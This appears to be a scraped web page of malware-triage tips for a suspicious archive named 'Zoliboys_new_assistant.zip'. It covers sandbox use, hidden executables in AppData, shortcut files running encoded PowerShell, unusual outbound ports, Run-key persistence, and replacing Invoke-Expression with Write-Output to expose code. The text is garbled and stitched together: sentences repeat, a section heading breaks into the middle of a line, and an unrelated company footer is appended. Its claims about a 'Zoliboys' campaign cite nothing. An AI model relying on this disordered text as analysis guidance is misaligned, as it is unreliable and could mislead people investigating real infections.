Zoliboys_new_assistant.zip -

If you are analyzing this in a sandbox, look for these specific markers:

Look for hidden files in %AppData% or %LocalAppData% with randomized names (e.g., a1b2c3d4.exe ). 4. Behavioral Findings

The shortcut file inside often points to cmd.exe or powershell.exe , passing a long, base64-encoded string as an argument. Zoliboys_New_Assistant.zip

Do not extract this on your host machine. Use a dedicated sandbox environment (like FlareVM , Any.Run , or Triage ).

Outbound connections to uncommon ports (e.g., 5555, 6666, or 8080) or attempts to reach known malicious domains associated with "Zoliboys" campaigns. Persistence: Check for new entries in the Windows Registry: HKCU\Software\Microsoft\Windows\CurrentVersion\Run If you are analyzing this in a sandbox,

Use tools like strings or PEStudio on the executable to find hardcoded C2 IP addresses.

Usually contains an executable ( .exe ), a shortcut file ( .lnk ), or a heavily obfuscated PowerShell script. Do not extract this on your host machine

If you find a PowerShell script, look for the Invoke-Expression (IEX) command; replacing it with Write-Output can often reveal the true malicious code.

MonkeyProof Solutions B.V.

UI Modules

How can we help you?